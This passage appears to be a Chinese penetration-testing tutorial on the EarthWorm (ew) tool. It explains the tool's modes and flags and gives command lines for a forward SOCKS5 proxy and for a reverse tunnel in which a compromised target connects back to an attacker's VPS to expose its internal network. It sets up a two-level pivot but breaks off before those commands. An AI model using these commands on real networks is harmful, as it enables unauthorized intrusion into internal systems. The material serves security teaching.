ew的使用
介绍:http://rootkiter.com/EarthWorm/
模式
ew有六种模式,分别是:
-
ssocksd
-
rcsocks
-
rssocks
-
lcx_slave
-
lcx_listen
-
lcx_tran
ssocksd是用于普通网络环境下的正向连接。
rcsocks 和 rssocks 用于反向连接。
lcx_slave 、lcx_listen 和 lcx_tran 用于复杂网络环境的多级连接。
常用参数
-
-l:指定要监听的本地端口
-
-d:指定要反弹到的机器 ip
-
-e:指定要反弹到的机器端口
-
-f:指定要主动连接的机器 ip
-
-g:指定要主动连接的机器端口
-
-t:指定超时时长,默认为 1000
一级代理
正向代理
当目标机器有一个公网ip时,可以使用以下命令建立一个socks5的代理。
./ew -s ssocksd -l 1080
反向代理
如果目标主机没有公网ip,则我们可以使用反向代理。在我们公网VPS(1.1.1.1)上建立一个转接隧道,将VPS 1080端口监听的流量转发到888端口。然后目标机器主动连接我们VPS的888端口。然后我们就可以通过设置代理为VPS的1080端口建立一条通往目标主机内网的socks5隧道了。
VPS:./ew -s rcsocks -l 1080 -e 888目标机器:./ew -s rssocks -d 1.1.1.1 -e 888
二级代理
现在有这么一种情况。服务器A能出网,服务器B不能出网,但是服务器B可以访问服务器C也就是靶标。服务器A不能访问到服务器C靶标,但是能通服务器B。
-
VPS:1.1.1.1
-
服务器A(Linux):192.168.10.136
-
服务器B(Windows):192.168.10.128
-
靶标web系统:http://192.168.10.132
首先,在VPS上开启如下监听,将1080端口监听的流量都转发到本地的888端口
本文始发于微信公众号(谢公子学安全):内网渗透 | 利用ew实现多级代理
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论